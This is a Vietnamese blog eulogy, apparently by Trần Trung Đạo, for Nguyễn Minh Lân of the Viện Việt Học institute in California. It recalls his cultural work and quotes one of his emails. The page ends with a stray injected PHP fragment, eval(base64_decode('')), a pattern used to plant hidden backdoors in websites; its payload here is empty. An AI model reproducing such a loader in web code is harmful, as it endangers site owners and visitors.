TIỄN BIỆT ANH NGUYỄN MINH LÂN

ttdao-nmlAnh Nguyễn Minh Lân, thành viên sáng lập và nồng cốt của ban điều hành Viện Việt Học vừa qua đời sáng hôm qua, 1 tháng 5, 2018 tại California.

Giữ trọng trách điều hành Viện Việt Học, dù biết mình bịnh nặng anh vẫn dành hết thời gian còn lại của đời mình cho cho văn hóa và giáo dục. Suốt 20 năm qua, anh đã thực hiện hay đóng góp phần quan trọng trong nhiều đề án của viện để giữ gìn tiếng Việt và văn hóa Việt ở quê người. Bảo tồn và phát huy văn hóa Việt tại hải ngoại là một nỗ lực vô cùng khó khăn mà chỉ những người có lý tưởng hiến dâng mới theo đuổi nỗi.

Với sự tận tụy của anh, Viện Việt Học là nơi gặp gỡ của hầu hết văn nghệ sĩ từ khắp nơi mỗi khi có dịp đặt chân đến Little Sài Gòn. Trong không gian tương đối nhỏ hẹp nhưng lòng người mênh mông đó, những chiều ra mắt sách, những đêm văn nghệ, những buổi tâm tình đã được anh và ban điều hành VVH tổ chức.

Với bản tính nhu hòa, hiền hậu, các em, dù gần hay xa, dù thân hay sơ, đều được anh đối xử dịu dàng, nhỏ nhẹ bên tách trà, trong email hay qua điện thoại.

Mỗi khi tôi đến Santa Ana anh đều muốn tổ chức một sinh hoạt gì đó để tôi gặp gỡ các bạn trẻ. Lần vừa rồi cũng vậy.

Trong một email, anh Nguyễn Minh Lân viết: “Đạo ơi, chương-trình Tâm Tình Với Trần Trung Đạo, Đạo cho anh biết, Đạo muốn như thế nào? Vì Đạo không có thì giờ, tối 24 tháng Sáu, Đạo đến VVH [Viện Việt Học] lúc 6:00 pm để bổ túc, điều chỉnh (nếu có) vài mục cuả chương-trình, thử âm-thanh…Trong CT đêm này, có Diệu Trang, đang sinh hoạt tại VVH tình nguyện hát bài Em Bé Việt Nam Và Viên Sỏi với piano. VVH sẽ có nồi cháo khuya cho đêm sinh-hoạt.
Anh mong tin Đạo.
Thăm nhiều,
Nmlan”

Nhưng khi tôi phải nhờ anh hủy bỏ chương trình vì không đủ thời gian anh cũng không trách một câu dù nhiều việc anh đã bỏ công sức ra làm.

Khác với những năm anh còn khỏe, những năm sau này biết anh bịnh nên mỗi khi xuống California, tôi thường ghé Viện Việt Học thăm anh. Lần cuối vào tháng Sáu năm 2017 nhân dịp hội ngộ Trung Học Trần Quý Cáp. Mỗi lần gặp anh tôi nghĩ đó là lần chót. Mà lần chót thật.

Rồi chúng ta sẽ lần lượt ra đi hết, biết còn ai để tiếc thương nhau.

Kính tiễn anh đi trước.

Em, Trần Trung Đạo

 

Leave a Reply

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>